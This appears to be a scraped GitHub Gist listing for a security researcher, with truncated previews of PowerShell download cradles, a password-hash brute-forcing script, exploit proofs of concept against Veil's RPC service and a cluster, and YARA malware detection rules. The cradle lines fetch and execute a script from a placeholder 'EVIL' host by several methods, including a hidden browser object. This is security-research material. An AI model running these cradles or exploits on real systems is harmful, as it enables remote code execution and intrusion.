Skip to content

Instantly share code, notes, and snippets.

Brian Wallace bwall

Block or report user

Report or block bwall

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@bwall
bwall / Comparing RF and CNN Adversarial Samples.ipynb
Last active Jun 9, 2018
Comparing RF and CNN Adversarial Samples
View Comparing RF and CNN Adversarial Samples.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@bwall
bwall / [Work in Progress] Ashes.ipynb
Created May 7, 2018
View [Work in Progress] Ashes.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@bwall
bwall / DownloadCradles.ps1
Created Jul 12, 2017 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@bwall
bwall / brute_force_hash_encoding.py
Created Jun 6, 2016
Attempt to brute force the hashing/encoding methods for stored passwords
View brute_force_hash_encoding.py
from hashlib import sha1, sha256, sha224, sha384, sha512, md5
from base64 import b64encode, b32encode
digest = "894b186bf79d4337c4f44140a2ec12b42d13a79f".decode("hex")
hexdigest = "894b186bf79d4337c4f44140a2ec12b42d13a79f"
methods = {
"encode_hex": lambda x: x.encode("hex"),
@bwall
bwall / Julia_Full_Cluster_Compromise.py
Created Apr 27, 2016
View Julia_Full_Cluster_Compromise.py
import socket
import time
import struct
from random import randint
TCP_IP = "172.16.195.169"
TCP_PORT = 9009
def send_payload(packet):
@bwall
bwall / exploit_veil_msfvenom.py
Last active Apr 20, 2016
View exploit_veil_msfvenom.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall
bwall / exploit_veil_pescrambler.py
Last active Apr 13, 2016
View exploit_veil_pescrambler.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall
bwall / exploit_veil_hyperion.py
Last active Apr 13, 2016
View exploit_veil_hyperion.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall
bwall / pocs.py
Last active Apr 1, 2016
Proof of concepts for recently released Veil RPC vulnerabilities
View pocs.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall
bwall / operation_dust_storm.yara
Created Feb 26, 2016
Operation Dust Storm (https://www.cylance.com/operation-dust-storm) YARA Rules
View operation_dust_storm.yara
rule Misdat_Backdoor_Packed
{
meta:
author = "Cylance SPEAR Team"
note = "Probably Prone to False Positive"
strings:
$upx = {33 2E 30 33 00 55 50 58 21}
$send = {00 00 00 73 65 6E 64 00 00 00}
$delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A}
You can’t perform that action at this time.